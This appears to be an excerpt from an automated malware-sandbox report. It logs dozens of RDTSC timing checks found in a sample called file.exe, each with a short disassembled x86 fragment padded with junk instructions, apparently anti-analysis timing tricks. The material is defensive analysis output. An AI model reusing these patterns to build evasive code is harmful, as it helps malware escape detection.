Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55368D second address: 5536AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A8h 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5536AD second address: 5536B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5536B3 second address: 5536B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5536B8 second address: 5536CC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5954CE94AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5536CC second address: 5536E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jnp 00007F595561499Eh 0x00000011 jno 00007F5955614996h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553834 second address: 553839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553B13 second address: 553B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE90A second address: 4FE942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5954CE94B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE942 second address: 4FE946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE9E8 second address: 4FE9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FE9EE second address: 4FE9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554AE2 second address: 554AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 554AEA second address: 554AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559429 second address: 559439 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5954CE94A6h 0x00000008 jbe 00007F5954CE94A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559439 second address: 559440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559440 second address: 559451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F5954CE94C4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559451 second address: 559457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559457 second address: 55945B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55945B second address: 559465 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5955614996h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55913F second address: 559143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559143 second address: 559147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559147 second address: 55915B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55915B second address: 559163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D360 second address: 55D366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D366 second address: 55D376 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55D376 second address: 55D37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55C921 second address: 55C940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F5955614996h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55C940 second address: 55C946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55C946 second address: 55C966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jbe 00007F5955614996h 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 jbe 00007F59556149A2h 0x00000018 jnl 00007F5955614996h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55CEBA second address: 55CEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F5954CE94ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55CEC7 second address: 55CED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56536E second address: 565374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56346D second address: 563473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 563473 second address: 563477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 563477 second address: 5634A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Ah 0x00000007 jmp 00007F595561499Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F59556149A0h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 563749 second address: 56376C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5954CE94B0h 0x00000008 jnl 00007F5954CE94A6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56376C second address: 563770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564227 second address: 56422E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564823 second address: 564838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F59556149A1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 564DE4 second address: 564DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56D888 second address: 56D8C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A0h 0x00000007 jmp 00007F59556149A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnc 00007F5955614996h 0x00000015 jnc 00007F5955614996h 0x0000001b jmp 00007F595561499Bh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56DB78 second address: 56DB83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DB83 second address: 56DBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5955614996h 0x0000000a jg 00007F5955614996h 0x00000010 popad 0x00000011 pushad 0x00000012 jnp 00007F59556149ADh 0x00000018 jmp 00007F59556149A7h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBB6 second address: 56DBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBBC second address: 56DBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DBC0 second address: 56DBE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B8h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F5954CE94AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56DD6E second address: 56DD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E180 second address: 56E186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577A4F second address: 577A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e jns 00007F5955614998h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576287 second address: 57628D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57628D second address: 576291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654A second address: 57654E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57654E second address: 57656B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F59556149A3h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576807 second address: 57680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57680B second address: 576811 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 576811 second address: 57681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57681E second address: 57686B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A0h 0x00000009 jl 00007F5955614996h 0x0000000f popad 0x00000010 popad 0x00000011 push esi 0x00000012 pushad 0x00000013 jmp 00007F59556149A7h 0x00000018 jmp 00007F59556149A6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57686B second address: 576875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769BE second address: 5769C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5769C2 second address: 5769DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577930 second address: 577935 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D331 second address: 57D33B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D33B second address: 57D341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D341 second address: 57D346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D346 second address: 57D35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D35F second address: 57D370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F5954CE94AEh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D4CD second address: 57D4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5955614996h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDE3 second address: 57FDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDE9 second address: 57FDEF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDEF second address: 57FDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57FDF6 second address: 57FDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A344 second address: 58A349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A349 second address: 58A350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A350 second address: 58A365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A365 second address: 58A37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F59556149A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDE5 second address: 58CDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F5954CE94AAh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDF6 second address: 58CDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CDFC second address: 58CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5954CE94AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CE0E second address: 58CE12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CE12 second address: 58CE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CE18 second address: 58CE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F5955614996h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C801 second address: 58C813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597EB8 second address: 597ECA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F5955614996h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 597ECA second address: 597EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F5954CE94ADh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B643E second address: 4B6444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6444 second address: 4B6467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5954CE94A6h 0x0000000a js 00007F5954CE94A6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F5954CE94A6h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6467 second address: 4B646B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A740A second address: 5A7424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7424 second address: 5A7432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F5955614998h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7432 second address: 5A7447 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7447 second address: 5A744D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7B7C second address: 5A7B8F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7E7E second address: 5A7EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F595561499Eh 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F59556149ADh 0x00000015 jmp 00007F59556149A4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7EC7 second address: 5A7ECE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC44D second address: 5AC462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F59556149AAh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jnp 00007F5955614996h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC462 second address: 5AC466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ABF85 second address: 5ABF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Ch 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC0EB second address: 5AC0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC0F5 second address: 5AC102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5955614996h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC102 second address: 5AC10E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5954CE94A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC10E second address: 5AC112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AC112 second address: 5AC128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
